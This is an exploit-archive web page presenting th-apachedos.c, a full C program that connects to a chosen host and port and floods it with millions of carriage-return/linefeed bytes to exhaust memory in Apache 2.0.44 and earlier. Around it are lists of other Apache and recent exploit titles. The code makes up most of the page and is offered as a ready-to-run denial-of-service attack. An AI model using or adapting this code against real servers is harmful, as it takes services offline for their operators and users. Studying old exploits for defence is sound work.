exploits , vulnerabilities , articles , apache <= 2.0.44 DoS exploit for linux th-apachedos.c"

2007-04-07 Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
2006-08-21 Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
2006-07-23 Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
2004-11-18 Apache <= 2.0.52 HTTP GET Remote Denial of Service Exploit
2004-10-21 Apache <= 1.3.31 mod_include local buffer overflow Exploit
2004-07-22 Apache httpd Arbitrary Long HTTP Headers DoS Exploit

2003-04-11

apache <= 2.0.44 DoS exploit for linux th-apachedos.c"

/******** th-apachedos.c
********************************************************
* *
* Remote Apache DoS exploit *
* ------------------------- *
* Written as a poc for the: *
* 
* This program sends 8000000 \n's to exploit the Apache memory leak. *
* Works from scratch under Linux, as opposed to apache-massacre.c . *
* 
* 
* Daniel Nyström <exce@netwinder.nu> *
* 
* - www.telhack.tk - *
* 
******************************************************** th-apachedos.c
********/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>


int main(int argc, char *argv[])
{
int sockfd;
int count;
char buffer[8000000];
struct sockaddr_in target;
struct hostent *he;

if (argc != 3)
{
fprintf(stderr, "\nTH-apachedos.c - Apache <= 2.0.44 DoS
exploit.");
fprintf(stderr,
"\n----------------------------------------------");
fprintf(stderr, "\nUsage: %s <Target> <Port>\n\n",
argv[0]);
exit(-1);
}

printf("\nTH-Apache DoS\n");
printf("-------------\n");
printf("-> Starting...\n"); 
printf("->\n");

// memset(buffer, '\n', sizeof(buffer)); /* testing */

for (count = 0; count < 8000000;) 
{
buffer[count] = '\r'; /* 0x0D */
count++;
buffer[count] = '\n'; /* 0x0A */
count++;
}

if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname() failed ");
exit(-1);
}

memset(&target, 0, sizeof(target));
target.sin_family = AF_INET;
target.sin_port = htons(atoi(argv[2]));
target.sin_addr = *((struct in_addr *)he->h_addr);

printf("-> Connecting to %s:%d...\n",
inet_ntoa(target.sin_addr), atoi(argv[2]));
printf("->\n");

if ((sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
perror("socket() failed ");
exit(-1);
}

if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr))
< 0)
{
perror("connect() failed ");
exit(-1);
}

printf("-> Connected to %s:%d... Sending linefeeds...\n",
inet_ntoa(target.sin_addr),
atoi(argv[2]));
printf("->\n");

if (send(sockfd, buffer, strlen(buffer), 0) != strlen(buffer))
{
perror("send() failed ");
exit(-1);
close(sockfd);
} 


close(sockfd);

printf("-> Finished smoothly, check hosts apache...\n\n");
}
securitydot.net - 2003-04-11

Exploits - newest 10 RSS | More

2007-06-15 32063 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 15839 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 18730 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 16668 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 10089 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 8507 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 10442 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 8558 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 18771 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 9022 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit